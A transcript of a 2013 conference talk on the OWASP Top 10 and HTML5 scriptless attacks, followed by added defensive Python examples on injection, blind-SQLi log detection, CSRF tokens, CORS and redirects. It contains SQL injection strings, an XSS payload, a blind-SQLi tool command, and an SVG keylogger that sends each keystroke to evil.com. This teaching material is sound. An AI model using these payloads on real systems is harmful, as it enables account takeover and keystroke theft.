The Web as the reference platform: old attacks and new vulnerabilities (La Web como plataforma de referencia: viejos ataques y nuevas vulnerabilidades)
Presentation by Pablo Garaizar (Universidad de Deusto) at the XV Jornada de Seguridad TI of Nextel S.A., held at the Alhóndiga in Bilbao on Thursday, 27 June 2013.
Transcript

  • 1. Pablo Garaizar, Universidad de Deusto. XV Jornada de Seguridad TI. The Web as the reference platform: old attacks and new vulnerabilities
  • 2. What are we going to talk about?
    ● Oldies goldies: OWASP Top 10, 2013:
      ● A1 - Injections
      ● A2 - Broken Authentication and Session Management
      ● A3 - Cross-Site Scripting (XSS)
      ● …
    ● New vulnerabilities around HTML5.
  • 3. OWASP Top 10, 2013
    https://www.owasp.org/index.php/Top_10_2013-Top_10
  • 4. OWASP: The Open Web Application Security Project
    https://www.owasp.org/index.php/Main_Page
  • 5. A1 - Injection. SQL, OS, and LDAP injections
    https://www.owasp.org/index.php/Top_10_2013-A1
  • 6. SQL Injection. All because of one little quote...
      SELECT * FROM users
      WHERE user = '" + username + "' AND
      password = '" + md5(password) + "'";
      Username: admin' OR '1'='1
      Password: whatever
      SELECT * FROM users
      WHERE user = 'admin' OR '1'='1' AND
      password = '" + md5(whatever) + "'";
  • 7. SQL Injection. If there are no error messages: Blind SQL Injection
    ● If there is no error, the normal page is shown.
      ● http://myblog.com/post.asp?id=33 AND 1=1
        SELECT * FROM posts WHERE id = 33 AND 1=1
    ● If there is an error, a different page is shown.
      ● http://myblog.com/post.asp?id=33 AND 1=0
        SELECT * FROM posts WHERE id = 33 AND 1=0
    ● Google Hacking:
      – inurl:"php?id="
      – inurl:"asp?id="
  • 8. SQL Injection. Blind SQL Injection tools
    ● SQLbfTools:
      – http://www.reversing.org/node/view/11
      ● ./mysqlbf.exe "http://web/vulnerable.php?ID=3" "now()" "word"
    ● SQL Ninja:
      – http://sqlninja.sourceforge.net/sqlninjademo1.html
    ● Absinthe:
      – http://www.0x90.org/releases/absinthe/download.php
  • 9. A2 - Broken Authentication and Session Management. Compromise passwords, keys, session tokens, etc.
    https://www.owasp.org/index.php/Top_10_2013-A2
  • 10. DEMO: Login in Flash
    inurl:login.swf
  • 11. A3 - Cross-Site Scripting (XSS). Allows attackers to execute scripts in the victim's browser
    https://www.owasp.org/index.php/Top_10_2013-A3
  • 12. Cross-Site Scripting (XSS). Different types and scopes
    ● Type 0: DOM-based.
      – A malicious page opens a local page with Local Zone permissions and runs code with those credentials.
      – Typically used in phishing or spam.
    ● Type 1: Non-persistent.
      – The most common type; it needs social engineering to be exploited.
      – Typically found on search sites, which echo back the queried string (if it contains code, the code is executed).
    ● Type 2: Persistent.
      – The code is stored in a database, a file, or similar.
      – Does not need much social engineering for the victim to execute it.
      – Typically found in forums and the like.
  • 13. A4 - Insecure Direct Object References. References to an internal implementation object, such as a file, directory, or database key
    https://www.owasp.org/index.php/Top_10_2013-A4
  • 14. RFI: PHP shells
    http://oco.cc/
  • 15. A5 - Security Misconfiguration. Keeping all software up to date
    https://www.owasp.org/index.php/Top_10_2013-A5
  • 16. The Exploit Database. Search for advisories + exploits, sorted by topic and date
    http://www.exploit-db.com/
  • 17. A6 - Sensitive Data Exposure. Sensitive data deserves extra protection such as encryption
    https://www.owasp.org/index.php/Top_10_2013-A6
  • 18. Security through obscurity: robots.txt
    http://www.casareal.es/robots.txt
      User-agent: *
      Disallow:
      Disallow: /_*/
      Disallow: /ES/FamiliaReal/Urdangarin/
      Disallow: /CA/FamiliaReal/Urdangarin/
      Disallow: /EU/FamiliaReal/Urdangarin/
      Disallow: /GL/FamiliaReal/Urdangarin/
      Disallow: /VA/FamiliaReal/Urdangarin/
      Disallow: /EN/FamiliaReal/Urdangarin/
      Sitemap: http://www.casareal.es/sitemap.xml
  • 19. Security through obscurity: metadata. Fear the FOCA!
    http://www.informatica64.com/foca.aspx
  • 20. A7 - Missing Function Level Access Control. Attackers are able to forge requests in order to access unauthorized functionality
    https://www.owasp.org/index.php/Top_10_2013-A7
  • 21. Protecting the cron script in Moodle. Similar for v1.9, 2.x, etc.
    http://docs.moodle.org/19/en/Cron
  • 22. A8 - Cross-Site Request Forgery (CSRF). Forces a logged-on victim's browser to send a forged HTTP request
    https://www.owasp.org/index.php/Top_10_2013-A8
  • 23. Cross-Site Request Forgery (CSRF). XSRF or "sea-surf"
    ● Exploits the trust a site places in the browser of an authenticated client.
      – The server: accepts the credentials of the user session stored in the browser.
      – The client: visits a web page that forces their browser to perform unwanted actions on a site where they have previously authenticated.
    ● Countermeasure: a specific token in every form.
  • 24. A9 - Using Components with Known Vulnerabilities. Vulnerable components, such as libraries, frameworks, and other software modules
    https://www.owasp.org/index.php/Top_10_2013-A9
  • 25. The Exploit Database. Search for advisories + exploits, sorted by topic and date
    http://www.exploit-db.com/
  • 26. A10 - Unvalidated Redirects and Forwards. Attackers can redirect victims to phishing or malware sites
    https://www.owasp.org/index.php/Top_10_2013-A10
  • 27. Redirection attacks. PoCs: IE/Firefox Redirection Issue – FB Oauth2 Bypass – BugCrowd
    http://soroush.secproject.com/blog/2013/03/iefirefox-redirection-issue-fb-oauth2-bypass-bugcrowd/
  • 28. New vulnerabilities around HTML5
  • 29. HTML5 Client-side Stored XSS in Web SQL Database
      <img onerror="alert('Client-side Stored XSS')" src="nil">
    http://www.andlabs.org/html5/csXSS2.html
  • 30. HTML5 Cross Origin Requests
      wget --header="Origin: http://www.andlabs.org" www.andlabs.net/html5/acCOR.php
    http://www.andlabs.org/html5/acCOR.php
  • 31. HTML5: many more attacks. Web Sockets, Web Workers, UI dressing, HTML5 tag abuse, etc.
    http://html5security.org/
  • 32. http://www.slideshare.net/x00mario/stealing-the-pie
  • 33. Scriptless attacks. Fake captcha using a custom font
    http://heideri.ch/opera/captcha/
  • 34. Scriptless attacks. Brute force against a password using CSS and regexps
    http://html5sec.org/invalid?start=0
  • 35. Scriptless attacks. Reading DOM values through CSS and regexps (CSRF)
    http://eaea.sirdarckcat.net/cssar/v2/
  • 36. Scriptless attacks. Session capture through CSS and regexps
    http://
  • 37. Scriptless attacks. SVG keylogger
    http://html5sec.org/keylogger
      <!--injection-->
      <svg height="0px">
      <image xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="none">
      <set attributeName="xlink:href" begin="accessKey(a)" to="//evil.com/?a" />
      <set attributeName="xlink:href" begin="accessKey(b)" to="//evil.com/?b" />
      <set attributeName="xlink:href" begin="accessKey(c)" to="//evil.com/?c" />
      <set attributeName="xlink:href" begin="accessKey(d)" to="//evil.com/?d" />
      <set attributeName="xlink:href" begin="accessKey(e)" to="//evil.com/?e" />
      <set attributeName="xlink:href" begin="accessKey(f)" to="//evil.com/?f" />
      <set attributeName="xlink:href" begin="accessKey(g)" to="//evil.com/?g" />
      <set attributeName="xlink:href" begin="accessKey(h)" to="//evil.com/?h" />
      <set attributeName="xlink:href" begin="accessKey(i)" to="//evil.com/?i" />
      <set attributeName="xlink:href" begin="accessKey(j)" to="//evil.com/?j" />
      <set attributeName="xlink:href" begin="accessKey(k)" to="//evil.com/?k" />
      <set attributeName="xlink:href" begin="accessKey(l)" to="//evil.com/?l" />
      <set attributeName="xlink:href" begin="accessKey(m)" to="//evil.com/?m" />
      <set attributeName="xlink:href" begin="accessKey(n)" to="//evil.com/?n" />
      <set attributeName="xlink:href" begin="accessKey(o)" to="//evil.com/?o" />
      <set attributeName="xlink:href" begin="accessKey(p)" to="//evil.com/?p" />
      <set attributeName="xlink:href" begin="accessKey(q)" to="//evil.com/?q" />
      <set attributeName="xlink:href" begin="accessKey(r)" to="//evil.com/?r" />
      <set attributeName="xlink:href" begin="accessKey(s)" to="//evil.com/?s" />
      <set attributeName="xlink:href" begin="accessKey(t)" to="//evil.com/?t" />
      <set attributeName="xlink:href" begin="accessKey(u)" to="//evil.com/?u" />
      <set attributeName="xlink:href" begin="accessKey(v)" to="//evil.com/?v" />
      <set attributeName="xlink:href" begin="accessKey(w)" to="//evil.com/?w" />
      <set attributeName="xlink:href" begin="accessKey(x)" to="//evil.com/?x" />
      <set attributeName="xlink:href" begin="accessKey(y)" to="//evil.com/?y" />
      <set attributeName="xlink:href" begin="accessKey(z)" to="//evil.com/?z" />
      </image></svg>
  • 38. Scriptless attacks. Brute force against passwords using a font with "ligatures"
    http://fontforge.org/
  • 39. "All user input is evil until proven otherwise" (Ken Cox)
  • 40. Thank you very much ;-) and... happy hacking!
  • 41. References
    ● OWASP: The Open Web Application Security Project.
    ● El lado del mal, hacking challenges, by Chema Alonso.
    ● Fear the FOCA! Informática64.
    ● IE/Firefox Redirection Issue – FB Oauth2 Bypass – BugCrowd, by Soroush Dalili.
    ● HTML5 Top 10 Threats: Stealth Attacks and Silent Exploits, by Shreeraj Shah.
    ● HTML5 security.
    ● Scriptless Attacks: Stealing the pie without touching the sill, by Mario Heiderich, Felix Schuster and Marcus Niemietz.
    ● The Exploit Database.
  • 42. All images are the property of their respective owners; the rest of the content is licensed under Creative Commons by-sa 3.0.
    http://www.zerodayclothing.com, OWASP.org, Microsoft, Exploit-db.com, Informatica64,
    http://www.flickr.com/photos/ivanlian/3331017290/sizes/l/in/photostream/
    http://www.flickr.com/photos/samout3/3411358304/sizes/l/in/photostream/
    http://www.flickr.com/photos/ndanger/9731511/sizes/l/in/photostream/
    http://www.flickr.com/photos/marcophoto/6264497575/sizes/l/in/photostream/
    etc.
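Slide 6 shows the login query built by string concatenation and the `admin' OR '1'='1` username that turns it into a tautology. The following is an added example, not code from the deck or from its author: it runs the slide's query against a constructed in-memory SQLite table (one user, `admin`, with the MD5 of a made-up password, kept only to mirror the slide), and places the parameterised version beside it so the difference is observable rather than asserted.

```python
"""Slide 6: string-concatenated login query versus a parameterised one.
Added example; the users table, the sample account and the password are constructed."""
import hashlib
import sqlite3


def md5(s: str) -> str:
    # The slide hashes the password with MD5; kept only to reproduce the slide.
    # Real code should use a slow, salted password hash (bcrypt, scrypt, Argon2).
    return hashlib.md5(s.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed sample database with a single account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", md5("s3cret")))
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """The slide's query: user input spliced straight into the SQL text.
    A single quote in `username` ends the string literal and the rest is parsed as SQL."""
    query = ("SELECT * FROM users WHERE user = '" + username
             + "' AND password = '" + md5(password) + "'")
    return conn.execute(query).fetchall()


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Same query with placeholders. The driver sends the values separately from
    the statement, so a quote in the username is just a character in the value."""
    query = "SELECT * FROM users WHERE user = ? AND password = ?"
    return conn.execute(query, (username, md5(password))).fetchall()


def demo() -> dict:
    """Row counts returned for a genuine login and for the slide's injected username."""
    conn = make_db()
    payload = "admin' OR '1'='1"  # the username from slide 6
    return {
        "vuln_legit": len(login_vulnerable(conn, "admin", "s3cret")),
        "vuln_injected": len(login_vulnerable(conn, payload, "whatever")),
        "safe_legit": len(login_safe(conn, "admin", "s3cret")),
        "safe_injected": len(login_safe(conn, payload, "whatever")),
    }


if __name__ == "__main__":
    print(demo())
```

With the injected username the concatenated query becomes `user = 'admin' OR ('1'='1' AND password = '...')`, which matches the admin row regardless of the password; the parameterised query looks for a user literally named `admin' OR '1'='1` and finds none.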
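Slide 7 describes blind SQL injection as a pair of requests that differ only in a condition that is always true (`AND 1=1`) or always false (`AND 1=0`), with the page's behaviour acting as the oracle. From the defender's side that pair is also the signature to look for in access logs. The following detection logic is an added example, not from the deck: it parses constructed Apache-style log lines, pulls out query parameters that carry a boolean condition, and flags a client that sends both a true and a false condition against the same path and parameter, reporting whether the response sizes differed.

```python
"""Slide 7: detecting blind SQL injection probe pairs in web server access logs.
Added example; the log lines, hosts and client addresses are constructed."""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log sample (combined log format, URL-encoded as a client would send it).
SAMPLE_LOG = """\
203.0.113.7 - - [27/Jun/2013:10:00:01 +0200] "GET /post.asp?id=33 HTTP/1.1" 200 5120
203.0.113.7 - - [27/Jun/2013:10:00:02 +0200] "GET /post.asp?id=33%20AND%201=1 HTTP/1.1" 200 5120
203.0.113.7 - - [27/Jun/2013:10:00:03 +0200] "GET /post.asp?id=33%20AND%201=0 HTTP/1.1" 200 418
198.51.100.4 - - [27/Jun/2013:10:00:05 +0200] "GET /post.asp?id=34 HTTP/1.1" 200 6001
198.51.100.4 - - [27/Jun/2013:10:00:06 +0200] "GET /search.asp?q=sql%20and%20you HTTP/1.1" 200 3010
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
# A boolean clause appended to what should be a plain value: AND 1=1, OR 1=0, and 'a'='a', ...
BOOL_RE = re.compile(r"\b(?:AND|OR)\s+'?\w+'?\s*=\s*'?\w+'?", re.IGNORECASE)


def parse_line(line: str):
    """Split one log line into client, path, decoded query parameters and response size."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["url"])
    rec["path"] = parts.path
    # parse_qsl percent-decodes, so "33%20AND%201=1" arrives as "33 AND 1=1"
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    rec["size"] = int(rec["size"]) if rec["size"].isdigit() else 0
    return rec


def find_boolean_probes(log_text: str) -> dict:
    """Per client: (path, parameter, normalised condition, response size) for every
    parameter value that carries a boolean clause."""
    probes = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        for key, value in rec["params"]:
            hit = BOOL_RE.search(value)
            if hit:
                cond = " ".join(hit.group(0).upper().split())
                probes[rec["ip"]].append((rec["path"], key, cond, rec["size"]))
    return probes


def flag_blind_sqli(log_text: str) -> list:
    """Flag a client that sent at least two different boolean conditions against the
    same path and parameter. distinct_sizes > 1 means the page answered differently
    to the true and false variants, i.e. the oracle the probe was looking for exists."""
    flagged = []
    for ip, hits in find_boolean_probes(log_text).items():
        by_target = defaultdict(set)
        for path, key, cond, size in hits:
            by_target[(path, key)].add((cond, size))
        for (path, key), observed in by_target.items():
            if len({cond for cond, _ in observed}) >= 2:
                flagged.append({
                    "ip": ip, "path": path, "param": key,
                    "conditions": sorted(cond for cond, _ in observed),
                    "distinct_sizes": len({size for _, size in observed}),
                })
    return flagged


if __name__ == "__main__":
    for f in flag_blind_sqli(SAMPLE_LOG):
        print(f)
```

The plain `search.asp?q=sql and you` request is not flagged because the pattern requires a comparison after the boolean keyword, and the client that only fetched `id=34` is never considered; a single stray `AND 1=1` would show up in `find_boolean_probes` but not in `flag_blind_sqli`, which insists on the true/false pair.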
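Slide 23 names the countermeasure for CSRF as a specific token in every form. The following is an added example of one way to implement that, not code from the deck: a token derived by HMAC from the session identifier and the form name, checked with a constant-time comparison. The request handler, the `transfer` form and the cookie and field names are constructed for illustration; the point demonstrated is that the browser attaches the session cookie automatically, but a page on another origin cannot obtain the token it must also present.

```python
"""Slide 23: per-form CSRF tokens bound to the session.
Added example; the handler, form name and request layout are constructed."""
import hashlib
import hmac
import secrets
from typing import Optional

# Constructed: a real server loads a persistent key from configuration.
SERVER_KEY = secrets.token_bytes(32)


def issue_token(session_id: str, form_name: str) -> str:
    """Token = HMAC-SHA256(key, session_id || form_name). Binding the form name stops a
    token issued for one action being replayed against another."""
    msg = f"{session_id}\x00{form_name}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def verify_token(session_id: str, form_name: str, presented: Optional[str]) -> bool:
    """Recompute and compare in constant time; a missing token is simply invalid."""
    if not presented:
        return False
    return hmac.compare_digest(issue_token(session_id, form_name), presented)


def handle_transfer(request: dict) -> str:
    """Toy POST handler. `request` stands in for the HTTP request:
    request["cookies"] is what the browser sends automatically (what CSRF relies on),
    request["form"] is the body the submitting page controls."""
    session_id = request.get("cookies", {}).get("session")
    if session_id is None:
        return "401 not logged in"
    form = request.get("form", {})
    if not verify_token(session_id, "transfer", form.get("csrf_token")):
        return "403 missing or invalid CSRF token"
    return f"200 transferred {form.get('amount')} to {form.get('to')}"


def render_transfer_form(session_id: str) -> str:
    """The legitimate page embeds the token as a hidden field when it renders the form."""
    token = issue_token(session_id, "transfer")
    return (f'<form method="post" action="/transfer">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            f'<input name="to"><input name="amount"><button>Send</button></form>')


if __name__ == "__main__":
    sid = "session-abc"            # constructed session identifier
    good = {"cookies": {"session": sid},
            "form": {"csrf_token": issue_token(sid, "transfer"), "to": "bob", "amount": "100"}}
    # A forged request from another origin: the cookie rides along, the token does not.
    forged = {"cookies": {"session": sid}, "form": {"to": "mallory", "amount": "100"}}
    print(handle_transfer(good))
    print(handle_transfer(forged))
```

The scheme is stateless (nothing is stored per form), which is why the token must be bound to the session and the form name; the alternative of storing a random per-session token server-side works equally well and is what most frameworks ship.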
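Slide 30 probes a cross-origin endpoint with `wget --header="Origin: http://www.andlabs.org" ...`, the check being whether the server echoes an arbitrary `Origin` back in `Access-Control-Allow-Origin`. The following added example, not code from the deck, puts the weak server-side policy (reflect any origin, with credentials) next to a corrected one that compares the `Origin` against an exact allowlist. The allowlisted origins are constructed; the `Origin` header value used in the test is the one from the slide.

```python
"""Slide 30: server-side CORS decision, weak (reflecting) versus allowlisted.
Added example; ALLOWED_ORIGINS and the request dicts are constructed."""
from urllib.parse import urlsplit

# Constructed allowlist. Entries are exact scheme://host[:port] strings.
ALLOWED_ORIGINS = {"https://app.example", "https://admin.example:8443"}


def cors_headers_weak(request_headers: dict) -> dict:
    """Anti-pattern: whatever Origin arrives is reflected, and credentials are allowed,
    so any site the user visits can read responses to authenticated requests."""
    origin = request_headers.get("Origin")
    if origin is None:
        return {}
    return {"Access-Control-Allow-Origin": origin,
            "Access-Control-Allow-Credentials": "true"}


def canonical_origin(origin: str):
    """Return scheme://host[:port] in lowercase, or None if the value is not a bare origin."""
    if origin == "null":            # sandboxed iframes, file://, redirects: never trust
        return None
    parts = urlsplit(origin)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return None
    if parts.path or parts.query or parts.fragment or parts.username is not None:
        return None
    return f"{parts.scheme}://{parts.netloc.lower()}"


def cors_headers_safe(request_headers: dict) -> dict:
    """Exact-match allowlist. Substring or prefix tests (e.g. `origin.startswith(...)` or
    `"app.example" in origin`) would let https://app.example.evil.example through."""
    origin = request_headers.get("Origin")
    if origin is None:
        return {}
    canonical = canonical_origin(origin)
    if canonical not in ALLOWED_ORIGINS:
        return {}                   # no CORS headers: the browser blocks the read
    return {"Access-Control-Allow-Origin": canonical,
            "Access-Control-Allow-Credentials": "true",
            "Vary": "Origin"}       # the response differs per origin; caches must know


if __name__ == "__main__":
    probe = {"Origin": "http://www.andlabs.org"}   # the header from slide 30
    print("weak:", cors_headers_weak(probe))
    print("safe:", cors_headers_safe(probe))
```

A quick way to audit an endpoint is exactly the slide's command with an origin you do not own: if the value comes back in `Access-Control-Allow-Origin` together with `Access-Control-Allow-Credentials: true`, the reflecting behaviour is present.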
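Slides 26 and 27 cover unvalidated redirects, with the linked PoC showing how browser URL parsing quirks defeat naive checks. The following is an added example of a redirect-target validator, not code from the deck or from the linked post: it accepts only same-site relative paths and rejects the forms that browsers resolve to another host, including scheme-relative `//host`, the `///host` and `/\host` variants, absolute URLs, non-HTTP schemes and CR/LF characters that would allow header injection. The site host name is constructed.

```python
"""Slides 26-27: validating a `next`/`redirect` parameter before issuing a 302.
Added example; SITE_HOST and the sample targets are constructed."""
from typing import Optional
from urllib.parse import urljoin, urlsplit

SITE_HOST = "www.example.test"   # constructed


def safe_redirect_target(target: Optional[str], default: str = "/") -> str:
    """Return `target` if it is a plain same-site path, otherwise `default`.

    Policy: only relative paths starting with a single "/" are accepted. Absolute URLs,
    scheme-relative URLs and anything a browser might reinterpret as a host are refused."""
    if not target:
        return default
    # Control characters (CR/LF header injection), whitespace and backslashes
    # (browsers treat "/\evil" like "//evil") are never part of a legitimate path.
    if any(ord(c) < 0x20 or c in "\\ \t\x7f" for c in target):
        return default
    # Must be an absolute path on this site; "//", "///", ... resolve to another host
    # in browsers even though urljoin() below would not agree, so check the raw string.
    if not target.startswith("/") or target.startswith("//"):
        return default
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:   # "javascript:", "https:evil", "//evil", ...
        return default
    # Belt and braces: resolve the way a browser would and confirm the host is ours.
    resolved = urlsplit(urljoin(f"https://{SITE_HOST}/", target))
    if resolved.netloc != SITE_HOST:
        return default
    return target


def redirect_response(next_param: Optional[str]) -> dict:
    """The 302 a login handler would emit after validating the `next` parameter."""
    return {"status": 302, "Location": safe_redirect_target(next_param)}


if __name__ == "__main__":
    for t in ["/account/settings", "//evil.example/", "///evil.example",
              "/\\evil.example", "https://evil.example/login", "javascript:alert(1)",
              "/ok\r\nSet-Cookie: a=b", "", None]:
        print(repr(t), "->", redirect_response(t)["Location"])
```

If absolute URLs back to the site itself must be honoured, extend the function to accept `https://` plus an exact host match; a `startswith("https://www.example.test")` test is not enough, because `https://www.example.test.evil.example` passes it.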